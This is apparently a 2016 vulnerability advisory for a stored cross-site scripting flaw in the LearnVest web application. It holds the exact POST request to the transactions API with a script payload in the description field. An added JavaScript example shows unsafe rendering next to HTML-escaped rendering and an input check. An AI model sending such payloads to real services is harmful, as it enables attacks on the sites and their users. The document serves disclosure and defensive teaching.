LearnVest Web Application suffers from a persistent cross-site scripting vulnerability.
# Exploit Title: LearnVest Web Application - Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://www.learnvest.com
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Request
Request
POST /api/20121201/transactions HTTP/1.1
Host: www.learnvest.com

[{"description":"<script>alert('xss')</script>","displayDate":"Jun 18, 2016","postDate":"2016-06-18","amount":2000,"folderId":405800536,"isCredit":"false","isFromATM":true}]
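The mitigation side of the request above, as an added example that is not part of the original advisory and is not LearnVest's code: the stored `description` value is rendered once by plain concatenation and once with HTML output encoding, plus a write-time check for markup in text fields. The function names, the table-row markup and the choice of fields to check are assumptions.

```javascript
// Added illustration; renderer names and markup are hypothetical, not LearnVest's code.

// Transaction as stored by the request in the advisory (body copied from the page).
const STORED = JSON.parse(
  `[{"description":"<script>alert('xss')</script>","displayDate":"Jun 18, 2016","postDate":"2016-06-18","amount":2000,"folderId":405800536,"isCredit":"false","isFromATM":true}]`
);

const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can change meaning in HTML text and attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable pattern: stored text is concatenated into markup unchanged,
// so the browser parses the description as an element.
function renderRowUnsafe(tx) {
  return "<tr><td>" + tx.displayDate + "</td><td>" + tx.description +
    "</td><td>" + tx.amount + "</td></tr>";
}

// Hardened pattern: every API-supplied field is encoded before it reaches the markup,
// so the description is displayed as literal text.
function renderRowSafe(tx) {
  const cells = [tx.displayDate, tx.description, tx.amount].map(
    (field) => "<td>" + escapeHtml(field) + "</td>"
  );
  return "<tr>" + cells.join("") + "</tr>";
}

// Write-time check (assumed policy): report free-text fields that contain
// angle brackets so the API can reject or log them before storage.
function findMarkupFields(tx, fields = ["description", "displayDate"]) {
  return fields.filter((name) => /[<>]/.test(String(tx[name] ?? "")));
}

console.log("unsafe:", renderRowUnsafe(STORED[0]));
console.log("safe:  ", renderRowSafe(STORED[0]));
console.log("fields with markup:", findMarkupFields(STORED[0]));
```

Output encoding at render time is the primary control; the write-time check is a secondary signal, since the same stored value may later be rendered in contexts that need different encoding.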